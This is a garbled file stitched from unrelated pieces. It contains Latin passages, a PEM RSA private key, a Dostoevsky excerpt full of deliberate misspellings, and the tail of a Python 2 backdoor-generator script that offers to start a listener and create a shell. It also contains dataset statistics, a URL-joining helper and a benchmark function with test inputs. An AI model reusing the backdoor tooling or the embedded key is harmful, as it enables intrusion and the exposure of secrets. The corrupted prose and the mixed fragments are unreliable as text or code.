Eodem tempore Serenianus ex duce, cuius ignavia populatam in Phoenice Celsen ante rettulimus, pulsatae maiestatis imperii reus iure postulatus ac lege, incertum qua potuit suffragatione absolvi, aperte convictus familiarem suum cum pileo, quo caput operiebat, incantato vetitis artibus ad templum misisse fatidicum, quaeritatum expresse an ei firmum portenderetur imperium, ut cupiebat, et cunctum.
Utque aegrum corpus quassari etiam levibus solet offensis, ita animus eius angustus et tener, quicquid increpuisset, ad salutis suae dispendium existimans factum aut cogitatum, insontium caedibus fecit victoriam luctuosam.
Nec sane haec sola pernicies orientem diversis cladibus adfligebat. Namque et Isauri, quibus est usitatum saepe pacari saepeque inopinis excursibus cuncta miscere, ex latrociniis occultis et raris, alente inpunitate adulescentem in peius audaciam ad bella gravia proruperunt, diu quidem perduelles spiritus inrequietis motibus erigentes, hac tamen indignitate perciti vehementer, ut iactitabant, quod eorum capiti quidam consortes apud Iconium Pisidiae oppidum in amphitheatrali spectaculo feris praedatricibus obiecti sunt praeter morem.
Unde Rufinus ea tempestate praefectus praetorio ad discrimen trusus est ultimum. ire enim ipse compellebatur ad militem, quem exagitabat inopia simul et feritas, et alioqui coalito more in ordinarias dignitates asperum semper et saevum, ut satisfaceret atque monstraret, quam ob causam annonae convectio sit impedita.
Hac ita persuasione reducti intra moenia bellatores obseratis undique portarum aditibus, propugnaculis insistebant et pinnis, congesta undique saxa telaque habentes in promptu, ut si quis se proripuisset interius, multitudine missilium sterneretur et lapidum.
Nihil est enim virtute amabilius, nihil quod magis adliciat ad diligendum, quippe cum propter virtutem et probitatem etiam eos, quos numquam vidimus, quodam modo diligamus. Quis est qui C. Fabrici, M'. Curi non cum caritate aliqua benevola memoriam usurpet, quos numquam viderit? quis autem est, qui Tarquinium Superbum, qui Sp. Cassium, Sp. Maelium non oderit? Cum duobus ducibus de imperio in Italia est decertatum, Pyrrho et Hannibale; ab altero propter probitatem eius non nimis alienos animos habemus, alterum propter crudelitatem semper haec civitas oderit.
Sed cautela nimia in peiores haeserat plagas, ut narrabimus postea, aemulis consarcinantibus insidias graves apud Constantium, cetera medium principem sed siquid auribus eius huius modi quivis infudisset ignotus, acerbum et inplacabilem et in hoc causarum titulo dissimilem sui.
Isdem diebus Apollinaris Domitiani gener, paulo ante agens palatii Caesaris curam, ad Mesopotamiam missus a socero per militares numeros immodice scrutabatur, an quaedam altiora meditantis iam Galli secreta susceperint scripta, qui conpertis Antiochiae gestis per minorem Armeniam lapsus Constantinopolim petit exindeque per protectores retractus artissime tenebatur.
Vide, quantum, inquam, fallare, Torquate. oratio me istius philosophi non offendit; nam et complectitur verbis, quod vult, et dicit plane, quod intellegam; et tamen ego a philosopho, si afferat eloquentiam, non asperner, si non habeat, non admodum flagitem. re mihi non aeque satisfacit, et quidem locis pluribus. sed quot homines, tot sententiae; falli igitur possumus.
Ibi victu recreati et quiete, postquam abierat timor, vicos opulentos adorti equestrium adventu cohortium, quae casu propinquabant, nec resistere planitie porrecta conati digressi sunt retroque concedentes omne iuventutis robur relictum in sedibus acciverunt.
Ego vero sic intellego, Patres conscripti, nos hoc tempore in provinciis decernendis perpetuae pacis habere oportere rationem. Nam quis hoc non sentit omnia alia esse nobis vacua ab omni periculo atque etiam suspicione belli?
Ac ne quis a nobis hoc ita dici forte miretur, quod alia quaedam in hoc facultas sit ingeni, neque haec dicendi ratio aut disciplina, ne nos quidem huic uni studio penitus umquam dediti fuimus. Etenim omnes artes, quae ad humanitatem pertinent, habent quoddam commune vinculum, et quasi cognatione quadam inter se continentur.
Iis igitur est difficilius satis facere, qui se Latina scripta dicunt contemnere. in quibus hoc primum est in quo admirer, cur in gravissimis rebus non delectet eos sermo patrius, cum idem fabellas Latinas ad verbum e Graecis expressas non inviti legant. quis enim tam inimicus paene nomini Romano est, qui Ennii Medeam aut Antiopam Pacuvii spernat aut reiciat, quod se isdem Euripidis fabulis delectari dicat, Latinas litteras oderit?
Post quorum necem nihilo lenius ferociens Gallus ut leo cadaveribus pastus multa huius modi scrutabatur. quae singula narrare non refert, me professione modum, quod evitandum est, excedamus.
Ipsam vero urbem Byzantiorum fuisse refertissimam atque ornatissimam signis quis ignorat? Quae illi, exhausti sumptibus bellisque maximis, cum omnis Mithridaticos impetus totumque Pontum armatum affervescentem in Asiam atque erumpentem, ore repulsum et cervicibus interclusum suis sustinerent, tum, inquam, Byzantii et postea signa illa et reliqua urbis ornanemta sanctissime custodita tenuerunt.
Nisi mihi Phaedrum, inquam, tu mentitum aut Zenonem putas, quorum utrumque audivi, cum mihi nihil sane praeter sedulitatem probarent, omnes mihi Epicuri sententiae satis notae sunt. atque eos, quos nominavi, cum Attico nostro frequenter audivi, cum miraretur ille quidem utrumque, Phaedrum autem etiam amaret, cotidieque inter nos ea, quae audiebamus, conferebamus, neque erat umquam controversia, quid ego intellegerem, sed quid probarem.
Paphius quin etiam et Cornelius senatores, ambo venenorum artibus pravis se polluisse confessi, eodem pronuntiante Maximino sunt interfecti. pari sorte etiam procurator monetae extinctus est. Sericum enim et Asbolium supra dictos, quoniam cum hortaretur passim nominare, quos vellent, adiecta religione firmarat, nullum igni vel ferro se puniri iussurum, plumbi validis ictibus interemit. et post hoe flammis Campensem aruspicem dedit, in negotio eius nullo sacramento constrictus.
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
"""%(host,port))
print " "
print(bcolors.OKGREEN+"OK LET`S GENERATING BACKDOOR .....")
print " "
startlis = raw_input(bcolors.OKGREEN+'Your Backdoor Is Ready Do YOU WANNA START LISTENING ? [yes] or [no]')
if startlis == "yes":
listen()
else:
print "Happy Hacking !! "
if (input1 == "1"):
createshell()
if (input1 == "2"):
listen()
| 132.668623
| 1,882
| 0.784254
| 42,275
| 248,621
| 4.61107
| 0.048918
| 0.006489
| 0.012471
| 0.004063
| 0.988006
| 0.987857
| 0.987411
| 0.987411
| 0.987411
| 0.987001
| 0
| 0.010742
| 0.173211
| 248,621
| 1,873
| 1,883
| 132.739455
| 0.937574
| 0.00008
| 0
| 0.894737
| 0
| 0.413666
| 0.991983
| 0.06282
| 0
| 1
| 0.000097
| 0
| 0
| 0
| null | null | 0.022161
| 0.004617
| null | null | 0.027701
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
94ba5199effc4fd9e9d9b0908e2ff1c2a53b3062
| 2,011
|
py
|
Python
|
core/recc/http/http_utils.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | 3
|
2021-06-20T02:24:10.000Z
|
2022-01-26T23:55:33.000Z
|
core/recc/http/http_utils.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
core/recc/http/http_utils.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from functools import reduce
from recc.variables.http import URL_PATH_SEPARATOR
from recc.http import http_urls as u
def join_urls(*paths: str) -> str:
assert paths
def _join(x: str, y: str) -> str:
if x[-1] == URL_PATH_SEPARATOR:
if y[0] == URL_PATH_SEPARATOR:
return x + y[1:]
else:
return x + y
else:
if y[0] == URL_PATH_SEPARATOR:
return x + y
else:
return x + URL_PATH_SEPARATOR + y
return reduce(_join, paths, u.root)
def v1_path(*paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v1, *paths)
return path.format(**kwargs) if kwargs else path
def v2_path(*paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v2, *paths)
return path.format(**kwargs) if kwargs else path
def v2_admin_path(*paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v2_admin, *paths)
return path.format(**kwargs) if kwargs else path
def v2_dev_path(*paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v2_dev, *paths)
return path.format(**kwargs) if kwargs else path
def v2_main_path(*paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v2_main, *paths)
return path.format(**kwargs) if kwargs else path
def v2_public_path(*paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v2_public, *paths)
return path.format(**kwargs) if kwargs else path
def v2_self_path(*paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v2_self, *paths)
return path.format(**kwargs) if kwargs else path
def v2_plugins_path(*paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v2_plugins, *paths)
return path.format(**kwargs) if kwargs else path
def v2_plugins_pplugin_path(plugin: str, *paths: str, **kwargs: str) -> str:
path = join_urls(u.api_v2_plugins, u.pplugin.format(plugin=plugin), *paths)
return path.format(**kwargs) if kwargs else path
| 29.144928
| 79
| 0.638986
| 310
| 2,011
| 3.964516
| 0.135484
| 0.053702
| 0.102522
| 0.124491
| 0.71847
| 0.71847
| 0.71847
| 0.71847
| 0.71847
| 0.637917
| 0
| 0.014839
| 0.229239
| 2,011
| 68
| 80
| 29.573529
| 0.778065
| 0.010443
| 0
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022727
| 1
| 0.25
| false
| 0
| 0.068182
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
bf3f835a19753f4fec689116a65fb76ef25d9347
| 53,816
|
py
|
Python
|
data/transcoder_evaluation_gfg/python/FIND_PERMUTED_ROWS_GIVEN_ROW_MATRIX.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 241
|
2021-07-20T08:35:20.000Z
|
2022-03-31T02:39:08.000Z
|
data/transcoder_evaluation_gfg/python/FIND_PERMUTED_ROWS_GIVEN_ROW_MATRIX.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 49
|
2021-07-22T23:18:42.000Z
|
2022-03-24T09:15:26.000Z
|
data/transcoder_evaluation_gfg/python/FIND_PERMUTED_ROWS_GIVEN_ROW_MATRIX.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 71
|
2021-07-21T05:17:52.000Z
|
2022-03-29T23:49:28.000Z
|
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( mat , m , n , r ) :
s = set ( )
for j in range ( n ) :
s.add ( mat [ r ] [ j ] )
for i in range ( m ) :
if i == r :
continue
for j in range ( n ) :
if mat [ i ] [ j ] not in s :
j = j - 2
break ;
if j + 1 != n :
continue
print ( i )
#TOFILL
if __name__ == '__main__':
param = [
([[16, 25, 26, 30, 34, 42, 51, 57, 69, 80], [15, 24, 29, 30, 31, 50, 55, 60, 71, 83], [6, 16, 22, 28, 34, 56, 61, 86, 88, 89], [14, 22, 24, 25, 26, 48, 73, 76, 78, 88], [2, 2, 12, 28, 28, 67, 68, 80, 81, 83], [8, 18, 27, 41, 62, 76, 77, 89, 94, 98], [9, 36, 41, 44, 47, 49, 76, 91, 92, 92], [18, 19, 27, 28, 29, 31, 43, 73, 93, 95], [32, 44, 59, 66, 70, 79, 88, 93, 94, 98], [12, 25, 29, 32, 37, 63, 71, 78, 82, 95]],7,5,8,),
([[-38]],0,0,0,),
